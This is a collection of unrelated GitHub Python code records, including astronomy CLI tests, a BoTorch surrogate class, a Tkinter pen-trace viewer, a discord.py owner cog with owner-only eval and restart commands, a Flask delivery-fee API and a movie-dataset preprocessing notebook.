task.work_order_id:\n\t\t\t\two_ids.append(task.work_order_id.id)\n\t\t# Delete entry from timesheet too while deleting entry to task.\n\t\tif wo_ids:\n\t\t\twork_order_obj.unlink(cr, uid, wo_ids, *args, **kwargs)\n\t\treturn super(project_task,self).unlink(cr, uid, ids, *args, **kwargs)\n\t\n\t_columns={\n\t\t'work_order_id':fields.many2one('project.work.order','Related Work Order', ondelete='set null'),\n\t}\nproject_task()","repo_name":"hendrasaputra0501/btxjalan","sub_path":"ad_project_work_order/project_work_order.py","file_name":"project_work_order.py","file_ext":"py","file_size_in_byte":10903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4206929542","text":"import textwrap\n\nfrom click.testing import CliRunner\n\nfrom musered.__main__ import cli\n\n\ndef test_list_datasets(mr):\n runner = CliRunner()\n result = runner.invoke(cli, [\"info\", \"--datasets\"])\n assert result.exit_code == 0\n assert result.output == textwrap.dedent(\n \"\"\"\\\n Datasets:\n - IC4406 : 6 exposures\n \"\"\"\n )\n\n\ndef test_list_runs(mr):\n runner = CliRunner()\n result = runner.invoke(cli, [\"info\", \"--runs\"])\n assert result.exit_code == 0\n assert result.output == textwrap.dedent(\n \"\"\"\\\n Runs:\n - GTO17 : 2017-04-01 - 2017-06-30, 6 exposures (1 flagged)\n \"\"\"\n )\n\n\ndef test_list_nights(mr):\n runner = CliRunner()\n result = runner.invoke(cli, [\"info\", \"--nights\"])\n assert result.exit_code == 0\n assert result.output == textwrap.dedent(\n \"\"\"\\\n Nights:\n - 2017-04-23\n - 2017-06-13\n - 2017-06-15\n - 2017-06-17\n - 2017-06-18\n - 2017-06-19\n - 2017-10-25\n - 2017-10-26\n \"\"\"\n )\n\n\ndef test_list_exposures(mr):\n runner = CliRunner()\n result = runner.invoke(cli, [\"info\", \"--exps\"])\n assert result.exit_code == 0\n assert result.output == textwrap.dedent(\n \"\"\"\\\n Exposures:\n - IC4406\n - 2017-06-16T01:34:56.867\n - 2017-06-16T01:37:47.867\n - 2017-06-16T01:40:40.868\n - 2017-06-16T01:43:32.868\n - 2017-06-16T01:46:25.866\n - 2017-06-16T01:49:19.866\n \"\"\"\n )\n\n\ndef test_list_calibs(mr):\n runner = CliRunner()\n result = runner.invoke(cli, [\"info\", \"--calibs\"])\n assert result.exit_code == 0\n assert result.output == textwrap.dedent(\n \"\"\"\\\n Calibrations:\n - BIAS\n - 2017-06-16T10:40:27\n - 2017-06-18T11:03:09\n - 2017-06-20T10:38:50\n - FLAT,LAMP\n - 2017-06-16T12:15:46\n - 2017-06-18T12:35:49\n - 2017-06-19T12:04:11\n - FLAT,LAMP,ILLUM\n - 2017-06-16T01:24:12\n - 2017-06-16T01:56:46\n - 2017-06-16T03:07:45\n - 2017-06-18T23:24:33\n - 2017-06-19T08:20:55\n - FLAT,SKY\n - 2017-06-18T22:04:55\n - OBJECT\n - 2017-06-16T01:34:08\n - STD\n - 2017-06-19T09:31:18\n - WAVE\n - 2017-06-16T12:32:03\n - 2017-06-18T12:51:47\n - 2017-06-19T12:20:06\n \"\"\"\n )\n\n\ndef test_info(mr):\n runner = CliRunner()\n result = runner.invoke(cli, [\"info\"])\n assert result.exit_code == 0\n assert result.output == textwrap.dedent(\n \"\"\"\\\n Reduction version 0.1\n 155 files\n\n Datasets:\n - IC4406 : 6 exposures\n\n Runs:\n - GTO17 : 2017-04-01 - 2017-06-30, 6 exposures (1 flagged)\n\n Raw data:\n\n name BIAS FLAT,LAMP FLAT,LAMP,ILLUM FLAT,SKY IC4406 STD WAVE\n ---------- ---- --------- --------------- -------- ------ --- ----\n 2017-06-15 11 11 3 -- 6 -- 15\n 2017-06-17 11 11 -- -- -- -- 15\n 2017-06-18 -- 11 2 4 -- 1 15\n 2017-06-19 11 -- -- -- -- -- --\n\n Processed calib data:\n\n name bias flat lsf scibasic standard twilight wavecal\n ---------- ---- ---- --- -------- -------- -------- -------\n 2017-06-15 1 3 1 -- -- -- 2\n 2017-06-17 1 3 1 -- -- -- 2\n 2017-06-18 -- 3 1 1 4 2 2\n 2017-06-19 1 -- -- -- -- -- --\n\n Processed science data:\n\n name mpdaf_combine exp_align ... scipost_rec zap\n ----------------------- ------------- --------- ... ----------- ---\n 2017-06-16T01:34:56.867 -- -- ... 2 --\n 2017-06-16T01:37:47.867 -- -- ... 2 --\n 2017-06-16T01:40:40.868 -- -- ... 2 --\n 2017-06-16T01:43:32.868 -- -- ... 2 --\n 2017-06-16T01:46:25.866 -- -- ... 2 --\n 2017-06-16T01:49:19.866 -- -- ... 2 --\n IC4406_drs -- -- ... -- --\n IC4406_mpdaf 5 -- ... -- 4\n OFFSET_LIST_drs -- 2 ... -- --\n \"\"\"\n )\n\n\ndef test_info_exp(mr, caplog):\n # test missing exp/night\n mr.set_loglevel(\"DEBUG\")\n mr.info_exp(\"2017-06-20\")\n assert caplog.records[0].message == \"2017-06-20 not found\"\n\n runner = CliRunner()\n result = runner.invoke(cli, [\"info-exp\", \"2017-06-16T01:34:56.867\"])\n assert result.exit_code == 0\n out = result.output.splitlines()\n for line in [\n \"★ GTO logs:\",\n \"★ Weather Conditions:\",\n \"★ Recipe: muse_scibasic\",\n \"★ Recipe: muse_scipost_rec\",\n \"★ Recipe: muse_scipost\",\n \"★ Recipe: muse_scipost_make_cube\",\n ]:\n assert line in out\n\n\ndef test_info_night(mr):\n runner = CliRunner()\n result = runner.invoke(\n cli, [\"info-exp\", \"--night\", \"2017-06-15\", \"--recipe\", \"bias\"]\n )\n assert result.exit_code == 0\n out = result.output.splitlines()\n assert \"★ Recipe: muse_bias\" in out\n\n result = runner.invoke(cli, [\"info-exp\", \"--night\", \"2017-06-15\", \"--short\"])\n assert result.exit_code == 0\n out = result.output.splitlines()\n assert \"★ Recipe: muse_bias\" in out\n\n\ndef test_info_raw(mr, capsys, caplog):\n runner = CliRunner()\n result = runner.invoke(cli, [\"info-raw\", \"night:2017-06-17\"])\n assert result.exit_code == 0\n out = result.output.splitlines()\n assert len(out) == 39\n\n result = runner.invoke(cli, [\"info-raw\", \"night:2017-06-17\", \"OBJECT:BIAS\"])\n assert result.exit_code == 0\n out = result.output.splitlines()\n assert len(out) == 13\n\n # test missing exp/night\n mr.info_raw(night=\"2017-06-20\")\n assert caplog.records[-1].message == \"Could not find exposures\"\n\n\ndef test_info_qc(mr):\n runner = CliRunner()\n result = runner.invoke(\n cli, [\"info\", \"--qc\", \"MASTER_FLAT\", \"--date\", \"2017-06-16T12:15:46\"]\n )\n assert result.exit_code == 0\n assert len(result.output.splitlines()) == 29 # 24 rows + header + expname\n\n result = runner.invoke(\n cli, [\"info\", \"--qc\", \"MASTER_FLAT\", \"--date\", \"2017-06-16T*\"]\n )\n assert result.exit_code == 0\n assert len(result.output.splitlines()) == 29 # 24 rows + header + expname\n\n result = runner.invoke(cli, [\"info\", \"--qc\", \"MASTER_FLAT\"])\n assert result.exit_code == 0\n assert len(result.output.splitlines()) == 29 * 3 # 3 nights\n\n\ndef test_info_warnings(mr):\n runner = CliRunner()\n result = runner.invoke(cli, [\"info-warnings\"])\n assert result.exit_code == 0\n assert result.output == textwrap.dedent(\n \"\"\"\\\n name muse_scipost muse_scipost_make_cube muse_wavecal\n ----------------------- ------------ ---------------------- ------------\n 2017-06-16T01:34:56.867 1 3 --\n 2017-06-16T01:37:47.867 1 3 --\n 2017-06-16T01:40:40.868 1 -- --\n 2017-06-16T01:43:32.868 1 -- --\n 2017-06-16T01:46:25.866 1 -- --\n 2017-06-16T01:49:19.866 1 3 --\n 2017-06-19T12:20:06 -- -- 5\n \"\"\"\n )\n\n result = runner.invoke(cli, [\"info-warnings\", \"-m\", \"list\", \"-r\", \"muse_wavecal\"])\n assert result.exit_code == 0\n assert result.output.splitlines() == [\n \"recipe_name ... log_file \",\n \"------------ ... --------------------------------------------------------------\",\n \"muse_wavecal ... ./reduced/0.1/logs/muse_wavecal-2018-11-14T20:03:11.243195.log\",\n ]\n\n result = runner.invoke(\n cli, [\"info-warnings\", \"-m\", \"detail\", \"-d\", \"2017-06-16T01:46:25.866\"]\n )\n # cannot be fully tested since log file is not in the test directory\n assert result.exit_code == 1\n assert result.output.strip() == \"muse_scipost, 2017-06-16T01:46:25.866, 1 warnings\"\n","repo_name":"musevlt/musered","sub_path":"tests/test_info.py","file_name":"test_info.py","file_ext":"py","file_size_in_byte":8522,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"18194262522","text":"import base64\nimport io\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom botorch.models.transforms.input import ChainedInputTransform, FilterFeatures\n\nfrom bofire.data_models.surrogates.api import BotorchSurrogate as DataModel\nfrom bofire.surrogates.surrogate import Surrogate\nfrom bofire.utils.torch_tools import tkwargs\n\n\nclass BotorchSurrogate(Surrogate):\n def __init__(\n self,\n data_model: DataModel,\n **kwargs,\n ):\n super().__init__(data_model=data_model, **kwargs)\n\n def _predict(self, transformed_X: pd.DataFrame):\n # transform to tensor\n X = torch.from_numpy(transformed_X.values).to(**tkwargs)\n with torch.no_grad():\n preds = self.model.posterior(X=X, observation_noise=True).mean.cpu().detach().numpy() # type: ignore\n stds = np.sqrt(self.model.posterior(X=X, observation_noise=True).variance.cpu().detach().numpy()) # type: ignore\n return preds, stds\n\n @property\n def is_compatibilized(self) -> bool:\n if self.is_fitted:\n if hasattr(self.model, \"input_transform\"):\n if self.model.input_transform is not None: # type: ignore\n if isinstance(self.model.input_transform, FilterFeatures): # type: ignore\n return True\n if isinstance(self.model.input_transform, ChainedInputTransform): # type: ignore\n if \"tcompatibilize\" in self.model.input_transform.keys(): # type: ignore\n return True\n return False\n\n def decompatibilize(self):\n if self.is_fitted:\n if self.is_compatibilized:\n if isinstance(self.model.input_transform, FilterFeatures): # type: ignore\n self.model.input_transform = None # type: ignore\n elif isinstance(self.model.input_transform, ChainedInputTransform): # type: ignore\n self.model.input_transform = self.model.input_transform.tf2 # type: ignore\n else:\n raise ValueError(\"Undefined input transform structure detected.\")\n\n def _prepare_for_dump(self):\n \"\"\"Decompatibilize the model before the dump\"\"\"\n self.decompatibilize()\n\n def _dumps(self) -> str:\n \"\"\"Dumps the actual model to a string via pickle as this is not directly json serializable.\"\"\"\n # empty internal caches to get smaller dumps\n self.model.prediction_strategy = None\n buffer = io.BytesIO()\n torch.save(self.model, buffer)\n return base64.b64encode(buffer.getvalue()).decode()\n\n def loads(self, data: str):\n \"\"\"Loads the actual model from a base64 encoded pickle bytes object and writes it to the `model` attribute.\"\"\"\n buffer = io.BytesIO(base64.b64decode(data.encode()))\n self.model = torch.load(buffer)\n","repo_name":"experimental-design/bofire","sub_path":"bofire/surrogates/botorch.py","file_name":"botorch.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"37"} +{"seq_id":"8241386103","text":"import argparse\nimport os\n\nfrom tkinter import *\nfrom PIL import Image, ImageTk, ImageGrab\nfrom functools import partial\n\nfrom utils import process_skeleton\nfrom trace_reconstruction import *\n\n\ndef _exit(window):\n\twindow.destroy()\n\texit()\n\n\ndef close(window):\n\twindow.destroy()\n\n\ndef center_window(window, width=300, height=200):\n\tscreen_width = window.winfo_screenwidth()\n\tscreen_height = window.winfo_screenheight()\n\n\tx = (screen_width/2) - (width/2)\n\ty = (screen_height/2) - (height/2)\n\n\twindow.geometry('+%d+%d' % (x, y))\n\n\nclass PrintTrace:\n\tdef __init__(self, trace, strokes, rate):\n\t\tself.cur_stroke = 0\n\t\tself.cur_idx = 0\n\t\tself.trace = trace\n\t\tself.strokes = strokes\n\t\tself.rate = rate\n\t\t# self.save_idx = 0\n\n\tdef __call__(self, event, canvas):\n\t\t# x = canvas.winfo_rootx() * 2 + canvas.winfo_x()\n\t\t# y = canvas.winfo_rooty() * 2 + canvas.winfo_y()\n\t\t# x1 = x + canvas.winfo_width() * 2\n\t\t# y1 = y + canvas.winfo_height() * 2\n\t\t# box = (x, y, x1, y1)\n\t\t#\n\t\t# grabcanvas = ImageGrab.grab(bbox=box)\n\t\t# grabcanvas = grabcanvas.convert('RGB')\n\t\t# grabcanvas.save(f\"out_{self.save_idx}.jpg\")\n\t\t# self.save_idx += 1\n\n\t\tif self.cur_stroke < len(self.trace):\n\t\t\ttrace = self.trace[self.cur_stroke][self.cur_idx:self.cur_idx + self.rate]\n\n\t\t\tif self.strokes[self.cur_stroke] == 'simple':\n\t\t\t\tcolor = 'red'\n\t\t\telif self.strokes[self.cur_stroke] == 'cyclic':\n\t\t\t\tcolor = 'blue'\n\t\t\telif self.strokes[self.cur_stroke] == 'vertical':\n\t\t\t\tcolor = 'green'\n\t\t\telif self.strokes[self.cur_stroke] == 'semivertical':\n\t\t\t\tcolor = 'yellow'\n\n\t\t\tcanvas.create_line(*trace, fill=color, width=2.5)\n\n\t\t\tif self.cur_idx + self.rate >= len(self.trace[self.cur_stroke]):\n\t\t\t\tself.cur_stroke += 1\n\t\t\t\tself.cur_idx = 0\n\t\t\telse:\n\t\t\t\tself.cur_idx += self.rate - 1\n\n\ndef build_trace(skeleton_path, scale):\n\tnodes, edges = process_skeleton(skeleton_path)\n\tskeleton_graph = SkeletonGraph(nodes, edges)\n\tmeta_graph = MetaGraph(skeleton_graph)\n\ttrace_reconstructor = TraceReconstructor(skeleton_graph, meta_graph)\n\ttrace = trace_reconstructor.trace()\n\tstroke_trace = trace_reconstructor.stroke_trace()\n\n\tskeleton_graph = skeleton_graph.nx_graph\n\n\tnode_trace = []\n\tstroke_names = []\n\n\tfor i in range(len(trace)):\n\t\tcc_stroke_trace, cc_trace = stroke_trace[i], trace[i]\n\t\tfor stroke in cc_trace:\n\t\t\tnode_trace.append(\n\t\t\t\t[(skeleton_graph.nodes[v]['x'] * scale, skeleton_graph.nodes[v]['y'] * scale) for v in stroke])\n\t\tstroke_names += [stroke.name for stroke in cc_stroke_trace]\n\n\treturn node_trace, stroke_names\n\n\ndef print_words(images_path, skeletons_path, rate=10):\n\n\tif os.path.isdir(images_path):\n\t\timgs = [os.path.join(images_path, f) for f in os.listdir(images_path) if f[-4:] == '.png' or f[-4:] == '.bmp']\n\telse:\n\t\timgs = [images_path]\n\n\tfor img_path in imgs:\n\t\timg = Image.open(img_path)\n\n\t\t# create window\n\t\twindow = Tk()\n\t\twindow.title(img_path)\n\n\t\tw = window.winfo_screenwidth() // 2\n\n\t\tscale = w / img.size[0]\n\t\th = int(scale * img.size[1])\n\n\t\timg = img.resize((w, h))\n\t\timg = ImageTk.PhotoImage(img)\n\n\t\tcenter_window(window, w, h)\n\n\t\tc = Canvas(window, width=w, height=h)\n\t\tc.create_image(0, 0, anchor=NW, image=img)\n\t\tc.pack(fill=BOTH, expand=1)\n\n\t\t# process skeleton\n\t\tbase = os.path.basename(img_path)\n\t\timg_name, _ = os.path.splitext(base)\n\t\tskeleton_path = os.path.join(skeletons_path, img_name + '.txt')\n\t\tnode_trace, stroke_names = build_trace(skeleton_path, scale)\n\n\t\tpt = PrintTrace(node_trace, stroke_names, rate)\n\n\t\tfunc_print = partial(pt, canvas=c)\n\t\tfunc_close = partial(close, window=window)\n\t\tfunc_exit = partial(_exit, window=window)\n\n\t\tButton(window, text=\"Close\", command=func_exit).pack(side=RIGHT, padx=5, pady=5)\n\t\tButton(window, text=\"Next\", command=func_close).pack(side=RIGHT)\n\t\twindow.bind('', func_print)\n\n\t\twindow.mainloop()\n\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--images-path', required=True)\n\tparser.add_argument('--skeletons-path', required=True)\n\tparser.add_argument('--rate', default=30, required=False)\n\targs = parser.parse_args()\n\tprint_words(args.images_path, args.skeletons_path, args.rate)\n","repo_name":"skryzhanovskaya/pen_trace_reconstruction","sub_path":"visual.py","file_name":"visual.py","file_ext":"py","file_size_in_byte":4070,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"29054639777","text":"import discord\nfrom discord.ext import commands\nfrom discord.ext.commands import bot_has_permissions\nimport ast\nimport sys\nimport os\n\n# These imports are just for the run command, for convenience\nimport subprocess\nimport datetime\nimport re\nimport json\nimport time\nimport requests\nimport random\n\n\ndef insert_returns(body):\n # insert return stmt if the last expression is a expression statement\n if isinstance(body[-1], ast.Expr):\n body[-1] = ast.Return(body[-1].value)\n ast.fix_missing_locations(body[-1])\n\n # for if statements, we insert returns into the body and the or else\n if isinstance(body[-1], ast.If):\n insert_returns(body[-1].body)\n insert_returns(body[-1].orelse)\n\n # for with blocks, again we insert returns into the body\n if isinstance(body[-1], ast.With):\n insert_returns(body[-1].body)\n\n\nclass Owner(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.is_owner()\n @commands.command()\n async def react_henwee(self, ctx, user=411536312961597440):\n with open(\"storage/all_message_ids.json\", \"r\") as f:\n file = json.load(f)\n\n for x in file[str(user)][\"messages\"]:\n message = await ctx.channel.fetch_message(x)\n await message.add_reaction(\"\")\n\n file = {\n \"368423564229083137\": {\"messages\": []},\n \"411536312961597440\": {\"messages\": []},\n }\n\n with open(\"storage/all_message_ids.json\", \"w\") as f:\n json.dump(file, f)\n\n @commands.is_owner()\n @commands.command(name = \"getstatus\")\n async def getstatus(self, ctx):\n await ctx.send(ctx.author.activities)\n \n @commands.is_owner()\n @commands.command(name=\"nickname\")\n async def change_nickname_admin(self, ctx, member: discord.Member, *, nickname=None):\n message = ctx.message\n await self.bot.http.delete_message(message.channel.id, message.id)\n\n if nickname == None:\n await ctx.send(\"please give me a nickname to change it to\")\n return\n\n else:\n try:\n member = ctx.guild.get_member(int(member.id))\n await member.edit(nick=nickname)\n await ctx.send(\n f\"Nickname was changed to {nickname}\\nbtw if anyone is wondering blame Avery for coming up with the idea for this :))))\",\n delete_after=3,\n )\n\n except Exception as e:\n await ctx.send(f\"{e}\", delete_after=5)\n\n @commands.is_owner()\n @commands.command(name=\"mepurge\", brief=\"Clears messages equal to the amount specified \")\n @bot_has_permissions(manage_messages=True)\n async def purge(self, ctx, amount=0, shut=\"shutupplz\"):\n if amount == 0:\n await ctx.send(\"please specifiy an amount\")\n return\n if 0 < amount <= 250:\n channel = ctx.message.channel\n messages = []\n async for message in channel.history(limit=amount + 1):\n messages.append(message)\n\n await channel.delete_messages(messages)\n if shut == \"shutupplz\":\n await ctx.send(\n f\"{amount} messages have been purged by {ctx.message.author.mention}\",\n delete_after=10,\n )\n else:\n pass\n\n else:\n await ctx.send(\"The limit provided is not within acceptable bounds.\")\n\n @commands.is_owner()\n @commands.command()\n async def load(self, ctx, extension):\n self.bot.load_extension(f\"cogs.{extension}\")\n await ctx.send(f\"{extension} was loaded\")\n\n @commands.is_owner()\n @commands.command()\n async def unload(self, ctx, extension):\n self.bot.unload_extension(f\"cogs.{extension}\")\n await ctx.send(f\"{extension} was unloaded\")\n\n @commands.command()\n @commands.is_owner()\n async def reload(self, ctx: commands.Context, cog: str):\n \"\"\"\n Reloads a cog and updates changes to it\n \"\"\"\n try:\n self.bot.reload_extension(\"cogs.\" + cog)\n self.bot.dispatch(\"load\", cog)\n except Exception as error:\n await ctx.send(f\"```py\\n{error}```\")\n return\n await ctx.send(\"✅\")\n print(f\"------------Reloaded {cog}------------\")\n\n @commands.is_owner()\n @commands.command(name=\"restart\", aliases=[\"reboot\"])\n async def restart(self, ctx):\n try:\n await self.bot.change_presence(\n status=discord.Status.idle,\n activity=discord.Activity(\n type=discord.ActivityType.watching,\n name=\"restarting - won't respond\",\n ),\n )\n await ctx.send(\"Restarting bot...\")\n os.execv(sys.executable, [\"python3\"] + sys.argv)\n except Exception as error:\n await ctx.send(f\"```py\\n{error}```\")\n return\n\n @commands.is_owner()\n @commands.command(name=\"shutdown\", aliases=[\"poweroff\", \"turnoff\"])\n async def shutdown(self, ctx):\n try:\n await ctx.send(\"turning off the bot...\")\n await self.bot.change_presence(\n status=discord.Status.idle,\n activity=discord.Activity(\n type=discord.ActivityType.watching,\n name=\"turning offline - won't respond\",\n ),\n )\n await self.bot.close()\n print(\"closed using !shutdown command\")\n except Exception as error:\n await ctx.send(f\"```py\\n{error}```\")\n return\n\n @commands.is_owner()\n @commands.command(name=\"change_status\")\n async def change_status_owner(self, ctx, *, input):\n try:\n await self.bot.change_presence(\n status=discord.Status.idle,\n activity=discord.Activity(type=discord.ActivityType.watching, name=f\"{input}\"),\n )\n except Exception as error:\n await ctx.send(f\"```py\\n{error}```\")\n\n @commands.is_owner()\n @commands.command(\n name=\"addtofunny\",\n aliases=[\n \"atf\",\n \"makefunny\",\n \"shitpostadd\",\n \"addshitpost\",\n \"jsonadd\",\n \"addjson\",\n ],\n brief=\"adds the specified thing to shitpost.json\",\n )\n async def addtofunnylist(ctx, *, funny=None):\n with open(\"./storage/shitpost.json\", \"r\") as f:\n shitposts = json.load(f)\n\n if funny is None:\n print(\"funny is None\")\n await ctx.send(\"funny is `None`\")\n\n shitposts[\"list\"].append(f\"{funny}\")\n await ctx.send(f\"added {funny} to list\")\n print(f\"added {funny} to shitpost index\")\n\n with open(\"./storage/shitpost.json\", \"w\") as f:\n json.dump(shitposts, f)\n\n @commands.is_owner()\n @commands.command(name=\"pip\")\n async def pipe(self, ctx, action, pip):\n if action == \"install\":\n await ctx.send(\n subprocess.check_call([sys.executable, \"-m\", \"pip\", f\"{action}\", f\"{pip}\"])\n )\n elif action == \"uninstall\":\n await ctx.send(\n subprocess.check_call([sys.executable, \"-m\", \"pip\", f\"{action}\", \"-y\", f\"{pip}\"])\n )\n else:\n await ctx.send(\"invalid action\")\n return\n await ctx.send(f\"{pip} has been {action}ed\")\n\n @commands.command(name=\"repeat-embed\")\n @commands.is_owner()\n async def repeatembed(self, ctx, title, desc = \"None\", footer = \"None\", *fields):\n embed = discord.Embed(title = title, description = desc, color = 0x00ff00)\n if footer != \"None\":\n embed.set_footer(text = footer)\n if fields != ():\n i = 0\n while i < len(fields):\n embed.add_field(name = fields[i], value = fields[i+1], inline = False)\n i += 2\n await ctx.send(embed=embed)\n\n @commands.command()\n @commands.is_owner()\n async def run(self, ctx, *, code: str):\n \"\"\"\n Run python stuff\n \"\"\"\n fn_name = \"_eval_expr\"\n\n code = code.strip(\"` \") # get rid of whitespace and code blocks\n if code.startswith(\"py\\n\"):\n code = code[3:]\n\n try:\n # add a layer of indentation\n cmd = \"\\n \".join(code.splitlines())\n\n # wrap in async def body\n body = f\"async def {fn_name}():\\n {cmd}\"\n\n parsed = ast.parse(body)\n body = parsed.body[0].body\n\n insert_returns(body)\n\n env = {\n \"bot\": self.bot,\n \"ctx\": ctx,\n \"message\": ctx.message,\n \"server\": ctx.message.guild,\n \"channel\": ctx.message.channel,\n \"author\": ctx.message.author,\n \"commands\": commands,\n \"discord\": discord,\n \"guild\": ctx.message.guild,\n }\n env.update(globals())\n\n exec(compile(parsed, filename=\"\", mode=\"exec\"), env)\n\n result = await eval(f\"{fn_name}()\", env)\n\n out = \">>> \" + code + \"\\n\"\n output = \"```py\\n{}\\n\\n{}```\".format(out, result)\n\n if len(output) > 2000:\n await ctx.send(\"The output is too long?\")\n else:\n await ctx.send(output.format(result))\n except Exception as e:\n await ctx.send(\"```py\\n>>> {}\\n\\n\\n{}```\".format(code, e))\n\n\nasync def setup(bot: commands.Bot) -> None:\n await bot.add_cog(Owner(bot))\n","repo_name":"JustTemmiesRandomProjects/Random-Scripts-I-ve-Made","sub_path":"discord-2.0-testing/cogs/owner.py","file_name":"owner.py","file_ext":"py","file_size_in_byte":9603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41445403851","text":"import logging\nimport sys\nfrom flask import Flask, request, jsonify\nimport datetime\n\napp = Flask(__name__)\n\ndef calculate_delivery_fee(cart_value, delivery_distance, number_of_items, time):\n \n def calculate_small_order_surcharge(cart_value):\n return 10 - cart_value if cart_value < 10 else 0\n\n def calculate_delivery_distance_fee(delivery_distance):\n delivery_distance_in_km = delivery_distance / 1000\n fee = 2 + (delivery_distance_in_km - 1) // 0.5\n return max(1, fee)\n\n def calculate_number_of_items_surcharge(number_of_items):\n surcharge = (number_of_items - 4) * 0.5 if number_of_items >= 5 else 0\n surcharge += 1.2 if number_of_items >= 13 else 0\n return surcharge\n\n def calculate_rush_hour_multiplier(time):\n try:\n time = datetime.datetime.strptime(time, '%Y-%m-%dT%H:%M:%SZ')\n if time.hour >= 15 and time.hour <= 19 and time.weekday() == 4:\n return 1.2\n except:\n pass\n return 1\n\n if cart_value >= 100:\n return 0\n\n fee = calculate_small_order_surcharge(cart_value)\n fee += calculate_delivery_distance_fee(delivery_distance)\n fee += calculate_number_of_items_surcharge(number_of_items)\n fee *= calculate_rush_hour_multiplier(time)\n\n return min(fee, 15)\n\n@app.route('/delivery_fee', methods=['POST'])\ndef delivery_fee():\n request_data = request.get_json()\n app.logger.debug(\"Received request data: %s\", request_data)\n cart_value = request_data.get('cart_value')\n delivery_distance = request_data.get('delivery_distance')\n number_of_items = request_data.get('number_of_items')\n time = request_data.get('time')\n\n fee = calculate_delivery_fee(cart_value, delivery_distance, number_of_items, time)\n \n response = {\n \"delivery_fee\": fee\n }\n\n app.logger.info(\"Calculated delivery fee: %s\", fee)\n\n return jsonify(response)\n\nif __name__ == '__main__':\n handler = logging.StreamHandler(sys.stdout)\n handler.setLevel(logging.DEBUG)\n app.logger.addHandler(handler)\n app.logger.setLevel(logging.DEBUG)\n app.run(debug=True)\n","repo_name":"shreyank06/delivery_fee_api","sub_path":"api_code/delivery_fee_api.py","file_name":"delivery_fee_api.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27245394197","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[6]:\n\n\n#!/usr/bin/env python\n# coding: utf-8\n\n# In[40]:\n\n\nimport numpy as np\nimport pickle\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport seaborn as sn\nimport json\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n\n# In[41]:\n\n\ndef top_tfidf_feats(row, features, top_n=25):\n ''' Get top n tfidf values in row and return them with their corresponding feature names.'''\n topn_ids = np.argsort(row)[::-1][:top_n]\n top_feats = [(features[i], row[i]) for i in topn_ids]\n df = pd.DataFrame(top_feats)\n df.columns = ['feature', 'tfidf']\n return df\n\n\n# In[42]:\n\n\ndef top_mean_feats(Xtr, features, grp_ids=None, min_tfidf=0.1, top_n=25):\n ''' Return the top n features that on average are most important amongst documents in rows\n indentified by indices in grp_ids. '''\n# if grp_ids:\n# D = Xtr[grp_ids].toarray()\n# else:\n D = Xtr.toarray()\n\n D[D < min_tfidf] = 0\n tfidf_means = np.mean(D, axis=0)\n return top_tfidf_feats(tfidf_means, features, top_n)\n\n\n# In[43]:\n\n\ndef top_feats_by_class(Xtr, y, features, min_tfidf=0.1, top_n=25):\n ''' Return a list of dfs, where each df holds top_n features and their mean tfidf value\n calculated across documents with the same class label. '''\n dfs = []\n labels = np.unique(y)\n for label in labels:\n ids = np.where(y==label)\n feats_df = top_mean_feats(Xtr, features, ids, min_tfidf=min_tfidf, top_n=top_n)\n feats_df.label = label\n dfs.append(feats_df)\n return dfs\n\n\n# In[44]:\n\n\ndef plot_tfidf_classfeats_h(dfs):\n ''' Plot the data frames returned by the function plot_tfidf_classfeats(). '''\n fig = plt.figure(figsize=(12, 9), facecolor=\"w\")\n x = np.arange(len(dfs[0]))\n for i, df in enumerate(dfs):\n ax = fig.add_subplot(1, len(dfs), i+1)\n ax.spines[\"top\"].set_visible(False)\n ax.spines[\"right\"].set_visible(False)\n ax.set_frame_on(False)\n ax.get_xaxis().tick_bottom()\n ax.get_yaxis().tick_left()\n ax.set_xlabel(\"Mean Tf-Idf Score\", labelpad=16, fontsize=14)\n ax.set_title(\"label = \" + str(df.label), fontsize=16)\n ax.ticklabel_format(axis='x', style='sci', scilimits=(-2,2))\n ax.barh(x, df.tfidf, align='center', color='#3F5D7D')\n ax.set_yticks(x)\n ax.set_ylim([-1, x[-1]+1])\n yticks = ax.set_yticklabels(df.feature)\n plt.subplots_adjust(bottom=0.09, right=0.97, left=0.15, top=0.95, wspace=0.52)\n plt.show()\n\n\n# In[45]:\n\n\nkeywords= pd.read_csv('./keywords.csv')\n# print(len(keywords))\nkeywords.drop_duplicates(keep=False,inplace=True) \nprint(len(keywords))\ncredits= pd.read_csv('./credits.csv')\n# print(len(credits))\ncredits.drop_duplicates(keep=False,inplace=True) \nprint(len(credits))\nmoviestokeep= pd.read_csv('./links_small.csv')\n\n\nmovies= pd.read_csv('./movies_metadata.csv')\nmovies.drop_duplicates(keep=False,inplace=True) \nprint(len(movies))\n\n\n# In[46]:\n\n\nidstokeep= list(moviestokeep.loc[:, 'tmdbId'])\nidstokeep2= list(keywords.loc[:, 'id'])\nidstokeep3= list(credits.loc[:, 'id'])\n\nkeywords2= keywords[keywords['id'].isin(idstokeep)]\n\nidstokeep4= list(keywords2.loc[:, 'id'])\n\ncredits2= credits[credits['id'].isin(idstokeep4)]\nidstokeep5= list(keywords2.loc[:, 'id'].apply(str))\nmovies2=movies[movies['id'].isin(idstokeep5)]\n# movies2['id'] = movies2['id'].apply(str)\nprint(len(keywords2))\nprint(len(credits2))\nprint(len(movies2))\n\n\n# In[47]:\n\n\npal=keywords2['id']\npal=np.array(pal)\n\nsal=credits2['id']\nsal=np.array(sal)\n\ntal=movies2['id']\ntal=np.array(tal)\n\n# print(len(np.intersect1d(pal,tal)))\n\n\n# 